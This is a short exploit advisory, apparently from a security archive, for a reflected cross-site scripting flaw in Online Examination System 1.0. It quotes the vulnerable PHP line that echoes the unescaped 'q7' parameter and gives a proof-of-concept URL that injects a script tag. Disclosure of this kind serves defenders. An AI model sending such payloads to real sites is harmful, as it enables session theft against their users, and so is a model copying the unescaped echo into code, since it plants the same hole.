Online Examination System 1.0 Cross Site Scripting

2022.09.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Online Examination System - Cross site scripting Reflected # Google Dork: N/A # Date: 2022-9-29 # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11 # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/ # Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip # Tested on: windows 11 - XAMPP # CVE : N/A # Version: 1.0 Vulnerability Details ====================== Steps : vulnerable code in file index.php 157 <?php if(@$_GET['q7']) 158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?> http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3E inject payload parameter q7


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top